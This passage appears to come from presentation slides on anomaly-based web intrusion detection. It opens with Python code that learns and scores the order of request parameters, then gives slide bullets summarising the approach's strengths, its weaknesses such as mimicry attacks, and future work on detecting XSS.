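    """Derive the set O of order constraints from ordered attribute lists."""
    edges, attrs = set(), set()
    for q in training_queries:
        attrs.update(q)
        edges.update(combinations(q, 2))   # (earlier, later) pairs

    def reachable(src):
        seen, stack = set(), [src]
        while stack:
            node = stack.pop()
            for a, b in edges:
                if a == node and b not in seen:
                    seen.add(b)
                    stack.append(b)
        return seen

    reach = {a: reachable(a) for a in attrs}
    # a precedes b if there is a path a -> b and no path b -> a.
    return {(a, b) for a in attrs for b in reach[a] if a not in reach[b]}

def order_score(constraints, query):
    """Return 0 if any pair in the query violates a constraint, else 1."""
    for a, b in combinations(query, 2):
        if (b, a) in constraints:
            return 0
    return 1

O = learn_order([["user", "cred"], ["user", "cred", "lang"]])
print(order_score(O, ["user", "cred"]), order_score(O, ["cred", "user"]))
```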

Conclusions of this paper
• An anomaly-based intrusion detection system for the web.
• Takes advantage of the application-specific correlation between server-side programs and the parameters used in their invocation.
• Parameter characteristics are learned from the input data.
• Tested on data from Google and from two universities in the US and Europe.

Summary of positive approaches
• Advantage:
  – By specifying normal behavior, they can detect unknown attacks.
• Problems:
  – The concept of normality is difficult to define.
  – They are vulnerable to mimicry attacks.
  – The detection threshold still requires manual intervention and substantial expertise.

Conclusion
• No method can be considered “the silver bullet”; many methods combine strengths from various techniques.
• It is important to provide techniques to better model sanitization and to assess whether a sanitization operation is appropriate for the task at hand.
• Novel web-specific attack techniques pose new challenges, whereas improper input validation is well known and well studied.
• There is no standard dataset usable as a baseline for evaluation.

Our future work
• Develop static and dynamic methods that specifically support the detection of XSS script code.

Thank you!